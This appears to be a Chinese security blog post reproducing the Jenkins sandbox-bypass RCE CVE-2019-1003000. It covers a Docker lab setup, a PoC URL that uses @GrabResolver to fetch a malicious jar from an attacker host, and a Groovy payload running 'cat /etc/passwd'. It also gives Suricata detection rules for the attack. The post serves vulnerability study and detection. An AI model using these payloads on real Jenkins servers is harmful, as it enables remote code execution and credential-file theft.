CVE-2019-1003000

最新推荐文章于 2024-04-04 22:14:12 发布
最新推荐文章于 2024-04-04 22:14:12 发布
阅读量233 收藏
点赞数
分类专栏: WEB攻防类
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanfengfengyuan/article/details/88875040
版权

msg -未成功还原

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。
近日Jenkins官网发布了编号为SECURITY-1266的安全通告,修复了3个CVE漏洞。这三个CVE漏洞都是由台湾安全研究员orange报告的,CVE编号分别为CVE-2019-1003000、CVE-2019-1003001、CVE-2019-1003002.
官方以及针对这三个CVE漏洞进行了修复,修复之后Orange也在其博客公布了具体的漏洞详情。

Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试报告, 发布报告等。Pipeline使开发者可以方便的去撰写一些构建脚本以完成自动化的编译、测试、发布,其中文名称是流水线(工作流),帮助开发者精心地组织一个可以长期运行在多个节点上的任务。

为了检查使用者撰写的Pipeline Script有没有语法上的错误,Jenkins提供了一个界面给使用者检查自己的Pipeline脚本。通过将抽象语法树(AST,Abstract Syntax Tree)转换注释(如@Grab)应用于源代码单元,可以在脚本编译阶段绕过脚本安全沙箱保护,导致具有Overall/Read权限或能控制SCM中jenkinsfile或沙盒Pipeline共享库内容的用户绕过沙盒保护,并在Jenkins服务器上执行任意代码。

利用转换注释@Grab、@GrabResolover可以写入恶意的Jar文件到jenkins服务器,由于Pipeline是基于Groovy语法的,因此Jenkins使用了GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,最终导致在编译阶段执行了写入到Jenkins服务器的恶意Jar文件。

安装

docker pull medicean/vulapps:j_jenkins_1
docker run -d -p 8080:8080 -p 50000:50000 medicean/vulapps:j_jenkins_1

系统管理->configure-> 项目矩阵授权策略
在这里插入图片描述
在这里插入图片描述
添加admin /admin用户
在这里插入图片描述

poc

http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
@Grab(group='tw.orange', module='poc', version='1')%0a
import Orange;

body中含有payload 类似 
  <script>
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","cat /etc/passwd").run().getOutputString()
</script>

检测

alert http any any -> any any (msg: "WAF.Jenkins.CVE-2019-1003000.Remote_Code_Execution.Threat.A"; flow: established, to_server; content: "POST"; http_method; nocase; content: "/job/"; http_uri; depth: 5; content: "/config.xml"; http_uri; content: "script"; http_client_body; pcre: "/<\s*script\s*>[\s\S]*@(Grab|ASTTest)/Ps";  reference: url, github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc; reference: cve, 2019-1003000; reference: cve, 2019-1003001; reference: cve, 2019-1003002; reference: url, github.com/ptresearch/AttackDetection; metadata: Open Ptsecurity.com ruleset; classtype: attempted-admin; sid: 10004529; rev: 1; )
pcre:"/POST\x20[\S]*/job/[\S]*config.xml[\s\S]*@(Grab|ASTTest)[\s\S]*HTTP\/\d\.\d\x20200/i"

alert http any any -> any any (msg:"WAF.Jenkins.CVE-2019-1003000.Remote_Code_Execution.Threat.B"; flow:established,to_server; content:"GET"; http_method; pcre:"/@(GrabConfig|GrabResolver|Grab)[^a-z]/Ui"; reference:url,https://mp.csdn.net/mdeditor/88875040; classtype:web-application-attack; sid:80000009; rev:1; metadata:created_at 2019_03_29, updated_at 2019_03_29;)
pcre:"/GET\x20[\S]*@(GrabConfig|GrabResolver|Grab)[\s\S]*HTTP\/\d\.\d\x20200/i"

在这里插入图片描述
在这里插入图片描述
PCAP:https://github.com/Fate9091/fate/blob/master/CVE-2019-1003000.rar

参考

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201901-777
https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

fate9091
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-1003000 Jenkins RCE 复现
prettyX的博客
06-18 1915
过程 前提,在Kali下安装好docker 准备漏洞环境 git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc pip install -r requirements.txt cd sample-vuln ./run.sh 在进行完上述命令之后,通过如下命令 docker ps 并未发现docker运行实例 通过查.
Jenkins RCE 漏洞(CVE-2019-1003000) 复现
锋刃科技的博客
09-24 3454
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
[漏洞复现] jenkins 远程代码执行 (CVE-2019-100300)
qq_45751902的博客
11-24 2064
拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码。此漏洞需要一个账号密码和一个存在的job。Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试报告, 发布报告等。
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoC:Jenkins RCE SECURITY-1266 / CVE-2019-1003000(脚本安全性),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明性) 一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的用户绕过沙盒保护,并在Jenkins主节点或节点上执行任意代码。 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
CVE-2019-1003000:[Jenkins]Script Security Plugin沙箱绕过
公众号shadow sock7
05-09 971
先访问 /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile 不带value, 跟进 workflow-cps.jar!\org\jenkinsci\plugins\workflow\cps\CpsFlowDefinition$DescriptorImpl#doCheckScriptCompile(@QueryParameter S
jenkins 增量发布插件_文末附操作实践 | Jenkins远程代码执行漏洞(CVE-2019-1003000)复现...
weixin_39774219的博客
12-09 200
t-img合天智汇安全预警2019年1月8日,Jenkins官方发布了一则ScriptSecurity and Pipeline插件远程代码执行漏洞的安全公告,漏洞CVE编号为:CVE-2019-1003000,官方定级为高危。2019年2月15日,网上公布了该漏洞的利用方式,该漏洞允许具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxedPip...
jenkins rec cve-2019-1003000 复现
whatday的专栏
07-19 1313
0X1 漏洞预警 2019年1月8日,Jenkins官方发布了一则Script Security and Pipeline 插件远程代码执行漏洞的安全公告,漏洞CVE编号为:CVE-2019-1003000,官方定级为高危。2019年2月15日,网上公布了该漏洞的利用方式,该漏洞允许具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxed Pipeline共享库内容的用户绕过沙盒保护并在Jenkins主服务器上执行任意代码。 Jenkins是一个开源软件
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
前言前几天听小伙伴说 Jenkins 出了个 RCE 我以为是说之前那个需要登录后才能RCE 的漏洞 。但结果小伙伴说这次这个不用登录就能 RCE 是 Oran
Jenkins RCE CVE-2019-1003000 漏洞复现
weixin_34102807的博客
02-21 1312
0x00 简述 拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码CVE-2019-1003000 (Script Security)CVE-2019-1003001 (Pipeline: Groovy)CVE-2019-1003002 (Pipeline: Declarative) 0x01 受影响的版本 Pipeline: Declarative Plu...
Jenkins远程命令执行漏洞
m0_48520508的博客
12-23 494
0x00简介 Jenkins自动化部署可以解决集成、测试、部署等重复性的工作,工具集成的效率明显高于人工操作;并且持续集成可以更早的获取代码变更的信息,从而更早的进入测试阶段,更早的发现问题,这样解决问题的成本就会显著下降:持续集成缩短了从开发、集成、测试、部署各个环节的时间,从而也就缩短了中间出现的等待时间;持续集成也意味着开发、集成、测试、部署得以持续。 0x01漏洞概述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者
Day80:服务攻防-中间件安全&HW2023-WPS分析&Weblogic&Jetty&Jenkins&CVE
最新发布
qq_61553520的博客
04-04 982
小迪安全-Day80:服务攻防-中间件安全&HW2023-WPS分析&Weblogic&Jetty&Jenkins&CVE
[CVE-2019-1003000]Jenkins Sandbox Bypass in Script Security and Pipeline Plugins
公众号shadow sock7
05-06 395
参考: https://www.jenkins.io/security/advisory/2019-01-08/ https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc https://www.exploit-db.com/exploits/46453 https://blog.51cto.com/13770310/235274...
为什么要使用Docker
weixin_43771403的博客
11-17 406
一、环境配置的难题 软件开发最大的麻烦事之一,就是环境配置。用户计算机的环境都不相同,你怎么知道自家的软件,能在那些机器跑起来? 用户必须保证两件事:操作系统的设置,各种库和组件的安装。只有它们都正确,软件才能运行。举例来说,安装一个 Python 应用,计算机必须有 Python 引擎,还必须有各种依赖,可能还要配置环境变量。 如果某些老旧的模块与当前环境不兼容,那就麻烦了。开发者常常会说:“它在我的机器可以跑了”(It works on my machine),言下之意就是,其他机器很可能跑不了。 环境
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4574
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
Docker运行vulfocus漏洞靶场
Onlyone_1314的博客
01-11 9103
目录标题(1)、docker安装(2)、部署vulfocus环境 Docker运行vulfocus漏洞靶场 搭建vulfocus漏洞靶场 (1)、docker安装 1.使用官方安装脚本自动安装 安装命令如下: c0url -fsSL https://get.docker.com | bash -s docker --mirror aliyun 也可以使用国内daocloud一键安装命令: curl -sSL https://get.daocloud.io/docker | sh 2.安装完成之后启动dock
CVE-2019-11477漏洞详解详玩(删)
Netfilter
06-28 6288
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
groovy script如何调试 jenkins_【安全预警】Jenkins插件远程代码执行漏洞
weixin_30332165的博客
12-31 221
北京时间2019年1月8日,Jenkins发布安全公告,此次的安全公告更新修复了Jenkins的Script Security以及Pipeline Plugins等插件的sandbox bypass远程代码执行漏洞。漏洞编号分别为CVE-2019-1003000(Script Security)、CVE-2019-1003001 (Pipeline: Groovy)、CVE-2019-100300...
[jenkins]CVE-2019-10352
公众号shadow sock7
07-18 2280
昨天Jenkins发布了安全公告,修复了几个漏洞,其中有一个 CVE-2019-10352,绕过了文件名的的限制,导致任意文件写入。但是需要Job/Configure权限(没啥用)。说是问题出在file parameter definition的地方。 Users with Job/Configure permission could specify a relative path escapi...
cve-2019-6341漏洞复现
锋刃科技的博客
09-26 1535
简介 Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成 影响版本 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 环境搭建 使用vulhub快速搭建环境 cd vulhub/drupal/CVE-2019-6341/ docker-compose up -d 访问your-ip:8080 ...
ES文件管理器未授权访问漏洞(CVE-2019-6447)
公众号shadow sock7
01-20 3881
漏洞描述 在受害者ES文件管理器启动一次后,会开放TCP端口59777作为HTTP服务器。攻击者可在没有访问控制的wifi环境下通过构造json请求,读取受害者的文件,启动受害者任意app。受害者手机无需root,攻击者也无需授权凭据。 影响范围: ES文件管理器 4.1.9.7.4 and below 经测试在root和非root手机上4.1.9.4版本ES文件管理器(http://shouji...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值